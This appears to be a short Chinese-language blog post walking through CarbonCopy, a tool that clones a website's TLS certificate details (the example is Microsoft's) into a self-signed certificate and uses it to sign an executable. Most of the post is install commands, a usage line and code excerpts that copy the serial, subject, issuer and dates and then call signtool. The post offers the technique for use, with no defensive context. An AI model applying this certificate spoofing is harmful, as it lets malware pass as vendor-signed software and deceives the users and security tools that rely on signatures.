证书伪造

项目地址:

https://github.com/paranoidninja/CarbonCopy

安装

1
2
3
4
https://github.com/paranoidninja/CarbonCopy.git
source /mnt/d/Project/python/venv3/bin/activate
apt-get install osslsigncode
pip3 install pyopenssl

usage

1
python3 CarbonCopy.py www.microsoft.com 443 web编码转换工具.exe sign-web编码转换工具.exe

代码中主要函数

获得host(www.microsoft.com)证书

1
2
ogcert = ssl.get_server_certificate((host, int(port)))
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)

创建虚假的证书

1
2
3
CNCRT   = certDir / (host + ".crt")
CNKEY = certDir / (host + ".key")
PFXFILE = certDir / (host + ".pfx")

创建Keygen

1
2
3
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
cert = crypto.X509()

从原始证书加载设置证书详细信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
print("[+] Cloning Certificate Version")
cert.set_version(x509.get_version())
print("[+] Cloning Certificate Serial Number")
cert.set_serial_number(x509.get_serial_number())
print("[+] Cloning Certificate Subject")
cert.set_subject(x509.get_subject())
print("[+] Cloning Certificate Issuer")
cert.set_issuer(x509.get_issuer())
print("[+] Cloning Certificate Registration & Expiration Dates")
cert.set_notBefore(x509.get_notBefore())
cert.set_notAfter(x509.get_notAfter())
cert.set_pubkey(k)
print("[+] Signing Keys")
cert.sign(k, 'sha256')

print("[+] Creating %s and %s" %(CNCRT, CNKEY))
CNCRT.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
CNKEY.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
print("[+] Clone process completed. Creating PFX file for signing executable...")

加上证书

1
2
3
4
shutil.copy(signee, signed)
subprocess.check_call(["signtool.exe", "sign", "/v", "/f", PFXFILE,
"/d", "MozDef Corp", "/tr", TIMESTAMP_URL,
"/td", "SHA256", "/fd", "SHA256", signed])
-------------本文结束感谢您的阅读-------------